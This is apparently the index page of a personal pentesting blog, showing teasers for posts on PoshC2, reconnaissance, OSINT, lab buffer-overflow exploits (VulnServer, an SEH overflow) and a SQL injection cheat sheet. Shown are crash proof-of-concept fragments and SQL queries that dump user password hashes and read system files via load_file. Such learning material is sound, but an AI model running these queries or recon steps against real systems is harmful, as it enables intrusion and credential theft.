Blog

PoshC2 Commands Reference

PoshC2 is an open-source command and control framework written in python3 which can be downloaded from https://github.com/nettitude/PoshC2. I was learning about this framework. Need to study more ;). But yeah, here some command i tested to see how they works! The PoshC2 command i have referenced here can be found using help command. This is just a few important command i have noted here(Nothing special)! I will add other commands when try them in my lab.
Read more →
Mar 21, 2022
Active Reconnaissance

Active Reconnaissance is the method of gathering information directly from the targets. Be aware, This information gathering method may get logged by IDS, IPS, and EDR. DNS Enumeration Sn1per This is a tool to use other open source tools for automated information gathering. Download Sn1per. Zone Transfer If zone transfer is misconfigured, all address will be discovered host -l ns google.com dnsrecon -d microsoft Discover Subdomain dnsenum -f namelist.txt microsoft.com sublist3r -o output.
Read more →
Mar 20, 2022
Open Source Intelligence(OSINT)

The purpose of OSINT is collecting information as much as possible, without directly interacting to the target! Note: The methods included here is not a complete OSINT methods What Hackers Collect? The information collected by them can be divided in two categories Business Information These information is all about the target company. For example What kind business the company is running. What is their activities. Partners and Investors information. Company Departments.
Read more →
Mar 19, 2022
Tmux Cheat Sheet

Tmux is a wonderful multiplexer and very useful tool for a penetration tester and red teamers. I use it a lots. Here i have noted most used tmux command for future reference! Custom .tmux.conf unbind C-b unbind '"' unbind % set-option -g prefix C-a bind-key C-a send-prefix bind h split-window -h bind v split-window -v set -g default-terminal "screen-256color" set -g message-style fg=white,bold,bg=red set -g status-style fg=white,bg=red set -g pane-border-style fg=red set -g pane-active-border-style "bg=red fg=green" set -g mouse on Session Here is some session management command
Read more →
Feb 21, 2022
Useful Keyboard Shortcut in Linux

If we want to work faster we need to know keyboard shortcuts. Always using mouse sometime boring. Even though, I don’t know all keyboard shortcuts. I am going to keep the common used keyboard shortcut! Shortcut in Debian Linux These shortcut works on Debina based Linux and Gnome Navigation Super+Shift+Left/Right Move window to left/right monitor Ctrl+Alt+Tab Switch System Controls Super+Tab Switch Applications Alt+Esc Switch Window Directly System Super+L Lock Screen Super+A Show All Notifications Alt+F2 Run Command Prompt Supper or Super+s Overview Logout Ctrl+Alt+Delete Window Alt+F7 Move Window Alt+F8 Resize Window Alt+Up/Down Restore Window Super+Left/Right Split on Left/Right Alt+F4 Close Window Super+h Hide Window Application Shortcut If the applications are gnome based, same shortcut should work on different distros
Read more →
Feb 21, 2022
Essential Tools for Penetration Tester

Every penetration tester, white hat hacker, red teamer required to use tools. Tools make our process easier. I will list my favorite tools with short description for future reference! If you think i have missed anything here, please let me know. I will update the post! Enumeration Information Gathering and Enumeration is the first stage for good and bad hackers. Enumerating using some opensources tools speed up the process. Here are some tools used for enumeration.
Read more →
Feb 6, 2022
Stack Overflow EGG Hunting(VulnServer)

There are some situation when our shellcode does not fit in small memory space. In this case we might be able to store our payload into a bigger memory address. But how we find the address? It is EGG which find the shellcode location by searching specific string(Tag) and start executing the code right after the tag. I will Vulnerable application: https://github.com/stephenbradshaw/vulnserver Crash POC: import socket vulCommand = b"KSTET \r\n" buffer = b"A"*1000 s = socket.
Read more →
Nov 28, 2021
SEH Stack Buffer Overflow

After a long time, I am again practicing how to exploit stack based buffer overflow. This post is just a quick note that how to exploit a simple SEH based overflow. The existing exploit can be found at https://www.exploit-db.com/exploits/50471 Application Download Link: https://www.exploit-db.com/apps/762256b7bcc2d7d47a394a52f522b16b-ytgrabber.exe Crash the Application POC Code: buffer = "A"* 9000 createFile = open('testing.txt',"w") createFile.write(buffer) createFile.close() Start Youtube Video Grabber and attach in windbg: Open testing.txt , copy the content, click on Enter code button, and paste into Username and Serial number field:
Read more →
Nov 27, 2021
SQL Injection Cheat Sheet

Enumeration Gather some juicy info to move to higher privileges MySQL Information SQL Query Database Version select @@version Current Database select database() Get other databases name select schema_name from information_schema.schemata Database User select user()select system_user() Database user, password hashes select host, user, password from mysql.user Tables Name select table_schema,table_name from information_schema.tablesselect table_name from information_schema.tables where table_schema='userdb' Columns Name select table_name, column_name **from** information_schema.columns select column_name **from** information_schema.columns where table_name = 'usertable' Read system Files select load_file('/etc/hosts') Write to File select "<?
Read more →
Sep 9, 2021
A quick cheat sheet on Python

This is not a complete python 3 tutorial. This just quick note to remember the python 3 syntax. Python Data Type: Name Type Description Integer int Numbers such as 100,200,1337 Strings str More than one characters such as “Cyber” Booleans bool Logical Value: True or False Floating Point float Numbers with decimal point such as: 1.1 Lists list Sequence of objects: [“Cyber”,10] Dictionaries dict Value pairs: {“key1″:”Cyber”,”key2″:”Red”} Sets set Collection of unique objects: {“test”,”test1″} Tuples tup Ordered secquence of objects: (1,”Cyber”) String Here is the example of String indexing and slicing:
Read more →
Aug 19, 2021
Web App Enumeration

Enumerate using Google Using Google or other search engine we may be able to gather some valuable information. We can search for: Config files SQL File Username, Private keys, even passwords Error messages Any other technical messages Mostly i use following queries: #Find pages site: site.com #Find Subdomain site: site.com -www #Find files php/jsp/aspx/asp/cfm/sql site: site.com filetype:php #Find the page if match keywords in title site: site.com intitle: admin login #if the title match our keyword site: site.
Read more →
Jan 14, 2021
Web Pentesting Checklist

For web pentesting, there are lots to be test. Below I have created a mandatory list what i never miss to test. The Goal? Reverse Shell! Note: This checklist created with help of owasp testing guide and with help of other resource found in the Internet. Recon/Enumeration Discover information using Google, Bing, Shodan, GitHub, Twitter, and LinkedIn Check if robots.txt, crossdomain.xml, clientaccesspolicy.xml, phpinfo.php sitemap.xml exist Identify Web Application Firewall Brute force subdomain DNS Reverse Lookup Brute Foce Files and Directory Analyze SSL Crawl entire site Find Emails, Employees, Phone numbers etc Wayback history Nmap Scan all ports(Including UDP) and do banner grabbing Identify input point Error Handling Request fake pages Try Different HTTP method such as TRACE, OPTIONS, DEBUG, NONE Request multiple parameters with different values(I.
Read more →
Jan 12, 2021

1
2
3